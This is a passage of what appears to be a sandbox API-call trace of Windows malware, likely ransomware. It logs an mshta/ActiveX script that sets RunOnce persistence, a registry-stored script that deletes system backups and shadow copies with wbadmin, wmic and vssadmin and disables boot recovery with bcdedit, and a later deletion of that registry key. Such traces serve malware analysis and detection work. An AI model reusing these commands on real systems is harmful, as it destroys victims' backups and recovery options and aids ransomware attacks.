lpWideCharStr="').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", cchWideChar=109, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpUsedDefaultChar=0x0) returned 109 [0060.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.433] SysReAllocStringLen (in: pbstr=0x18fda4*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x109 | out: pbstr=0x18fda4*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.433] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x109 | out: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.433] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpStartupInfo=0x18fdd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fdc4 | out: lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpProcessInformation=0x18fdc4*(hProcess=0xe8, hThread=0x174, dwProcessId=0x7bc, dwThreadId=0x544)) returned 1 [0060.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4044d8, lpParameter=0x1ea1b10, dwCreationFlags=0x0, lpThreadId=0x441220 | out: lpThreadId=0x441220*=0x5cc) returned 0x164 [0060.444] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.444] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.444] GlobalUnlock (hMem=0x45000c) returned 0 [0060.445] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.445] GlobalUnlock (hMem=0x45000c) returned 0 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.446] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.446] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.446] GlobalUnlock (hMem=0x450004) returned 0 [0060.446] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdd4 | out: lpPerformanceCount=0x18fdd4*=18080092340) returned 1 [0060.446] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdd4 | out: lpPerformanceCount=0x18fdd4*=18080100571) returned 1 [0060.446] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.446] GlobalUnlock (hMem=0x450004) returned 0 [0060.447] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.447] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.447] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.447] GlobalUnlock (hMem=0x450004) returned 0 [0060.447] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.447] GlobalUnlock (hMem=0x45000c) returned 0 [0060.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\[M[ZF", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x18fdb4, lpdwDisposition=0x18fdb8 | out: phkResult=0x18fdb4*=0x170, lpdwDisposition=0x18fdb8*=0x1) returned 0x0 [0060.447] RegSetValueExA (in: hKey=0x170, lpValueName="HMEYE", Reserved=0x0, dwType=0x1, lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);", cbData=0x164 | out: lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);") returned 0x0 [0060.448] RegCloseKey (hKey=0x170) returned 0x0 [0060.448] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.448] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.448] GlobalUnlock (hMem=0x45000c) returned 0 [0060.448] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.448] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.448] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.448] GlobalUnlock (hMem=0x45000c) returned 0 [0060.448] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.448] GlobalUnlock (hMem=0x450004) returned 0 [0060.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e3eb48, cbMultiByte=104, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"쯘W\x18㱴矇㲣矇\x9d矍\x18άU") returned 104 [0060.449] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e544d8, cbMultiByte=5, lpWideCharStr=0x18ede4, cchWideChar=2047 | out: lpWideCharStr="[M[ZFta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"쯘W\x18㱴矇㲣矇\x9d矍\x18άU") returned 5 [0060.449] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"", len=0x68 | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"") returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"", cchWideChar=104, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 104 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="~", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\\\\!$));close();\"", cchWideChar=16, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\!$));close();\"cript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 16 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="~", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.449] SysReAllocStringLen (in: pbstr=0x18fe2c*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", len=0x6c | out: pbstr=0x18fe2c*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"") returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", cchWideChar=108, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 108 [0060.449] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e45e78, cbMultiByte=108, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"㱴矇㲣矇\x9d矍\x18άU") returned 108 [0060.450] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e54518, cbMultiByte=5, lpWideCharStr=0x18ede4, cchWideChar=2047 | out: lpWideCharStr="HMEYEta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"㱴矇㲣矇\x9d矍\x18άU") returned 5 [0060.450] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", len=0x6c | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"") returned 1 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", cchWideChar=108, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"a", lpUsedDefaultChar=0x0) returned 108 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$));close();\"", cchWideChar=13, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$));close();\"vascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"a", lpUsedDefaultChar=0x0) returned 13 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.450] SysReAllocStringLen (in: pbstr=0x18fe20*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", len=0x70 | out: pbstr=0x18fe20*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"") returned 1 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=112, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"l", lpUsedDefaultChar=0x0) returned 112 [0060.450] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e45ef8, cbMultiByte=112, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"\x9d矍\x18άU") returned 112 [0060.451] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", len=0x70 | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"") returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=112, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 112 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=66, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 66 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=").RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=52, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=").RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 52 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=41, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\");close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 41 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="));close();\"", cchWideChar=12, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="));close();\"re\\\\[M[ZF\\\\HMEYE$));close();\");close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 12 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", len=0x70 | out: pbstr=0x18fe14*="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 1 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", cchWideChar=112, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"l", lpUsedDefaultChar=0x0) returned 112 [0060.453] WinExec (lpCmdLine="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", uCmdShow=0x0) returned 0x21 [0074.322] Sleep (dwMilliseconds=0x1f4) [0074.823] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20006, phkResult=0x18fdec | out: phkResult=0x18fdec*=0x170) returned 0x0 [0074.824] RegDeleteKeyA (hKey=0x170, lpSubKey="[M[ZF") returned 0x0 [0074.824] RegCloseKey (hKey=0x170) returned 0x0 [0074.825] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.825] GlobalUnlock (hMem=0x45000c) returned 0 [0074.825] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.825] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.825] GlobalUnlock (hMem=0x45000c) returned 0 [0074.825] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.825] GlobalUnlock (hMem=0x450004) returned 0 [0074.825] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.825] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.826] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.826] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20006, phkResult=0x18fd4c | out: phkResult=0x18fd4c*=0x0) returned 0x2 [0074.826] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.827] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.827] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.827] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.827] GlobalUnlock (hMem=0x450004) returned 0 [0074.827] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.827] GlobalUnlock (hMem=0x45000c) returned 0 [0074.829] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd00 | out: lpPerformanceCount=0x18fd00*=19518419267) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcf8 | out: lpPerformanceCount=0x18fcf8*=19518426782) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcf0 | out: lpPerformanceCount=0x18fcf0*=19518434098) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fce8 | out: lpPerformanceCount=0x18fce8*=19518440344) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fce0 | out: lpPerformanceCount=0x18fce0*=19518446252) returned 1 [0074.830] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.830] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.830] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.830] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.830] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.831] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.831] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.831] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.831] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.831] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.831] GlobalUnlock (hMem=0x450004) returned 0 [0074.831] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd10 | out: phkResult=0x18fd10*=0x0) returned 0x2 [0074.831] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 